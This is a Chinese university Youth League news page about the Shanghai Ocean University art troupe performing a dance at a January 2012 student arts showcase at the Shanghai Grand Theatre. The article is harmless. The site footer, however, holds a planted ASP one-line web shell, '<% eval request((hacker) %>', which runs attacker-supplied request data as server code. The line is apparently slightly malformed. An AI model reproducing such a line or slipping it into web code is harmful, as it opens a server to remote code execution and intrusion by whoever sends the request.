当前位置:共青团上海海洋大学委员会 >> 学生组织 >> 校艺术团 >> 正文  
站内信息搜索:
让青春放歌 我校艺术团首登上海大剧院舞台
[2012年02月29日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

2012年1月15日晚,由市教卫党委、市教委主办的“青春放歌”――上海大学生艺术实践基地成果展示暨上海市第三届大学生艺术展演优秀节目汇演在上海大剧院举行。中共上海市委副书记、市长韩正,副市长沈晓明等领导出席晚会并观看演出。

我校艺术团表演舞蹈“紫金流云”

“紫金流云”

徐雷雷作为文化志愿者代表我校发言

谢幕时全体演员与韩正等市领导合影

演出结束后艺术团同学在舞台合影留念

演出前,黄晞建副书记到后台看望舞蹈团的同学们

本次汇演作为2011年度上海大学生艺术实践基地建设成果及全市大学生艺术展演的精选,汇聚了市14个高校艺术实践基地的节目,囊括了戏曲、服装、民乐、京剧、舞蹈、合唱、芭蕾、武术、交响乐等各类艺术形式,展现了当代大学生蓬勃朝气的精神风貌、深厚的艺术修养、紧跟时代的青春活力。我校作为唯一一个非艺术实践基地高校参与汇演,为观众们带来了舞蹈《紫金流云》。舞蹈团同学们灵动的舞步让台下的观众领略了属于海大人的魅力。同时,我校徐雷雷同学作为文化志愿者作志愿者心语发言:“带着海洋的魂与魄,我们踏浪而行,用青春演绎出艺术的浪花,潮涨潮落,永不停歇。”道出了海大人对艺术的热情和执着追求。

此次汇演,演出的同学们为配合演出放弃假期,从1月10日开始为演出效果重新编排舞蹈、增加海洋元素,在学校集中排练。期间有团员生病、受伤,但他们依然坚持着,互相鼓励加油。校团委的组织人员在加班加点做好后勤保障的同时,多次参加导演组的讨论、坐排和联排,为演出的顺利进行做好协调沟通工作。校领导对此次演出高度支持,多次关心同学们的彩排和生活情况,校党委副书记、副校长黄晞建在演出前带着宣传部、学生处(团委)相关人员慰问了演员。

2月,全国大学生第三届艺术展演决赛将在杭州举行,《紫金流云》将参与舞蹈类决赛。为了准备全国比赛,舞蹈团的同学们2月1日就将回校进行集训,希望届时我校艺术团舞蹈团能为我校再创佳绩,载誉归来!

(撰稿:何杉 摄影:程震)

 

关闭窗口

上一篇:彝族歌舞展示别样风情 “高雅艺术进校园”圆满举行

下一篇:我校舞蹈团首登全国大学生艺术展演决赛舞台
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>